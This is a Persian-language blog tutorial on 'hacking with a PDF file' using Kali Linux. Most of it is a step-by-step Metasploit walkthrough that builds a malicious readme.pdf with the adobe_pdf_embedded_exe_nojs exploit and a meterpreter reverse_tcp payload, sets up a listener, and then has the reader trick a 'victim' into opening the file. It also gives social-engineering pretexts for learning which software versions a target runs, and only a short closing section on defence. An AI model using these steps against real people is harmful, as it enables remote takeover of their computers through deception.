موضوعات وبسایت : تبلیغات
سوالات ICDL
آموزش امنیت اینستاگرام

دستورات هک کالی لینوکس pdf

دستورات هک کالی لینوکس pdf

نویسنده : علی بجنوردی | زمان انتشار : 01 آذر 1400 ساعت 14:59

در این قسمت از اموزش قصد داریم شما را با نحوه تست نفوذ سیستم به وسیله فایل pdf اشنا کنیم. با ما در ادامه این اموزش هک و امنیت همراه باشید .

آموزش امنیت اینستاگرام
سوالات ICDL

آموزش تست امنیت ویندوز با هک با فایل pdf

یکی از سوالات پر تکرار کاربران این است که چگونه می توانیم تست نفوذ خود را با فرمت های مختلف انجام دهیم و به نتیجه برسیم ؟؟ اولین کاری که باید انجام دهید این است که درباره هدف خود اطلاعات جمع اوری کنید و همانگونه که می دانید اولین و مهم ترین مرحله در تست نفوذ information gathering یا  جمع اوری اطلاعات است زیرا هرچقدر اطلاع بیشتری از هدف و قربانی خود به دست اورید کار شما در هنگام تست نفوذ بسیار راحت تر خواهد بود و سریع تر پیش خواهد رفت , به این منظور باید اطلاعاتی از قبیل برنامه های موجود بر روی سیستم هدف خود را بدانید , اما چگونه ؟ نفوذگر می تواند با استفاده از مهندسی اجتماعی به راحتی متوجه شود که قربانی خود از چه ابزار هایی استفاده می کند .

برای درک بهتر این موضوع به مثال زیر توجه کنید :

نفوذگر با هر روشی با قربانی خود ارتباط برقرار می کند ( برقراری ارتباط می تواند به صورت مجازی و استفاده از شبکه های اجتماعی باشد یا به صورت حضوری یا تلفنی و … باشد. ) سپس نفوذگر در این مرحله خود را یک کاربر تازه وارد در دنیای کامپیوتر معرفی می کند و از قربانی خود سوالاتی طبیعی خواهد پرسید , برای مثال : سلام دوست عزیز من شنیده ام که شما در زمینه کامپیوتر مهارت خوبی دارید می توانید به من کمک کنید تا نرم افزار های مورد نیاز اولیه برای یک کامیپوتر را نصب کنم ؟؟

سپس زمانی که قربانی این حقه را باور کرد نفوذگر می تواند از او سوال کند :

  • به نظر شما برای نمایش ویدیو در سیستم از چه مدیا پلیری استفاده کنم ؟
  • به نظر شما بهترین ورژن مجموعه نرم افزار office کدام است ؟
  • به نظر شما از کدام نسخه ادوب استفاده کنم ؟پ

درک مفهوم مهندسی اجتماعی

خب شاید از خود بپرسید که چنین سوالاتی بسیار ساده هستند و چنین اطلاعاتی به چه درد نفوذ گر می خورد,
اما بیایید کمی به پشت پرده این سوالات دقت داشته باشیم .

زمانی که نفوذگر چنین سوالاتی را از قربانی خود خواهد پرسید , قربانی بدون شک نسخه ای از نرم افزار را به نفوذگر پیشنهاد خواهد داد که خودش نیز در حال استفاده از ان نسخه است و به این ترتیب نفوذگر از ابزار های موجود و ورژن ابزار های موجود در سیستم قربانی مطلع خواهد شد وسپس نفوذگر می توانید با استفاده از جستجو در سایت های ثبت اکسپلویت به دنبال اسیب پذیری های مربوطه بگردد و در نهایت به نتیجه دلخواه خود برسد.

منطق تست نفوذ با استفاده از فرمت های مختلف

منطق تست نفوذ و هک با فرمت های مختلف فایل ها مانند pdf و psd

ایا تا به حال به این موضوع دقت کرده اید که نفوذگر ها چگونه می توانند با استفاده از فرمت های مختلف به سیستم قربانی های خود نفوذ کنند ؟؟ تصور کنید نفوذگر قصد دارد با استفاده از پسوند psd که فایل خروجی نرم افزار فتوشاپ است به سیستم قربانی خود نفوذ کند , به این منظور یک فایل psd برای قربانی خود ارسال می کند و با کلیک کردن و اجرا کردن ان فایل توسط  قربانی از سیستم مربوطه در دسترسهکر قرار می گیرد.

برای چنین کاری نفوذگر باید نرم افزار فتوشاپ را مورد بررسی قرار دهد و با استفاده از مهندسی معکوس این نرم افزار را تحلیل و بررسی کند و اسیب پذیری  هایی را در این نرم افزار پیدا کند و در  نهایت زمانی که اسیب پذیری مورد نظر را در نرم افزار فتوشاپ پیدا کرد، باید اکسپلویتی را برای نرم افزار فتوشاپ بنویسد که این اکسپلویت بتواند از اسیب پذیری موجود سو استفاده کند تا زمانی که قربانی , بر روی فایل مخرب با پسوند psd کلیک کرد و ان را اجرا کرد بتواند از سیستم قربانی دسترسی بگیرد.

آشنایی کلی با اکسپلویت

دقت داشته باشید که هر اسیب پذیری نیاز به یک اکسپلویت دارد, تصور کنید قصد دارید از یک درب ورودی ,  عبور کنید به این منظور باید به دنبال اسیب پذیری داخل  درب باشید , سپس با بررسی این درب متوجه خواهید شد که  درب مورد نظر شما دارای یک اسیب پذیری است که اگر با یک چکش پنج مرتبه بر روی قفل ان ضربه بزنید قفل درب خواهد شکست و می توانید از درب مربوطه عبور کنید , در این قسمت اسیب پذیری مشخص شد

اکسپلویت دقیقا همان چکش است که می توانید با استفاده ازبه کارگیری ان از در عبور کنید .

ابزار ها و سرویس های مختلف هم دقیقا به همین صورت کار می کنند به این منظور که نفوذگر در ابتدا اسیب پذیری را در یک سرویس پیدا خواهد کرد و در نهایت با نوشتن یک اکسپلویت از ان اسیب پذیری استفاده یا سو استفاده می کند.

در ادامه به صورت عملی با استفاده پیلود pdf به سیستم عامل ویندوز نفوذ خواهیم کرد .

نحوه تست نفوذ به ویندوز با از طریق هک با فایل pdf

نحوه هک با فایل pdf

در ابتدا سیستم عامل کالی لینوکس خود را بوت و راه اندازی کنید

سپس باید ابزار Metasploit را اجرا کنید , به این منظور می توانید ترمینال لینوکس خود را اجرا کنید

و دستور زیر را در این محیط وارد کنید تا این ابزار برای شما اجرا شود :

msfconsole

سپس زمانی که محیط متاسپلویت برای شما اجرا شد

باید با استفاده از دستور زیر اکسپلویت مورد نظر را فراخوانی کنید :

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

در این مرحله باید آپشن های مورد نظر خود را بر روی اکسپلویت تنظیم کنید

که برای مشاهده آپشن های موجود می توانید از دستور زیر استفاده نمایید :

show options

حال می توانید با استفاده از دستور زیر و تعیین نام , یک نام را برای فایل Pdf خود انتخاب کنید :

set FILENAME readme.pdf

در مرحله بعدی باید یک پیلود برای اکسپلویت خود انتخاب کنید که پیشنهاد ما استفاده از پیلود meterpreter است

, به این منظور از دستور زیر برای تنظیم یک پیلود استفاده کنید :

set PAYLOAD /windows/meterpreter/reverse_tcp

سپس باید با استفاده از دستور show options , اپشن های موجود را مشاهده کنید

و ان را به صورت مراحل پایین شخصی سازی نمایید.

انجام تنظیمات متاسپلویت برای تست نفوذ و هک با فایل pdf

با استفاده از دستور زیر ای پی خود را بر روی پیلود تنظیم کنید :

set LHOST 127.0.0.1

نکته : برای مشاهده ای پی خود می توانید از دستور ifconfig استفاده کنید.

سپس باید با استفاده از دستور زیر یک پورت دلخواه از پورت های شبکه را به پیلود معرفی کنید :

set LPORT 4567

در این مرحله باید فایل مخرب pdf خود را ایجاد کنید :

exploit

سپس یک ترمینال جدید باز کنید و دستور زیر را در ترمینال وارد نمایید :

cd /root/Desktop/ && mv /root/.msf4/local/readme.pdf readme.pdf

دستور بالا یک دستور ترکیبی است که ابتدا شما را به مسیر دسکتاپ وارد می کند و سپس فایل مخرب شما که در مسیر /root/.msf4/local/ قرار دارد را به صفحه دسکتاپ شما انتقال خواهد داد. در این مرحله به محیط متاسپلویت بازگردید و با استفاده از اکسپلویت مولتی هندلر یک listener برای هک تارگت خود با فایل pdf ایجاد کنید. سپس می توانید با استفاده از روش های مهندسی اجتماعی تارگت خود را قانع کنید تا بر روی فایل مخرب شما کلیک کند و اگر قربانی شما از ابزار اسیب پذیر و ورژن اسیب پذیر استفاده کند , شما می توانید از قربانی خود دسترسی بگیرید.

امنیت در مقابل این نوع حملات

جلوگیری از هک شدن با فایل pdf

بهترین روش برای برقراری امنیت سیستم خود در برابر این نوع حملات , هوشیاری شما است و باید دقت داشته باشید که فایل های مورد نظر خود را از منابع معتبر دانلود کنید و مورد استفاده قرار دهید و از افراد ناشناس و مشکوک فایلی را دریافت نکنید و حتی اگر شرایطی وجود داشت که مجبور به اجرای فایل مشکوک بودید , فایل را در یک محیط مجازی اجرا و تست کنید تا حتی اگر فایل مورد نظر شما یک فایل مخرب است , نفوذگر فقط و فقط دسترسی به محیط مجازی شما را داشته باشد و محیط اصلی سیستم عامل شما در امنیت کامل باشد، که می توانید با استفاده از مجازی سازی هایی مانند vm ware سیستم عامل های مجازی مانند ویندوز 10 و غیره را برای خود نصب و اجرا کنید.

نتیجه گیری

در این قسمت از اموزش شما را با نحوه کار کرد اکسپلویت ها اشنا کردیم و یاد گرفتید که نفوذگر چگونه می تواند با استفاده از فایل pdf و دیگر فرمت های موجود از قربانی خود دسترسی بگیرد و اسیب هایی خطرناک را به قربانی خود وارد کند و شما باید همیشه هوشیار باشید و از جدیدترین متد ها اگاه باشید تا بتوانید امنیت خود را در برابر چنین حملات حفظ کنید.

دقت داشته باشید که امنیت هیچ گاه صد درصد نیست .

آیا این مطلب برای شما مفید بود؟




ارسال نظر

نام


ایمیل


نظر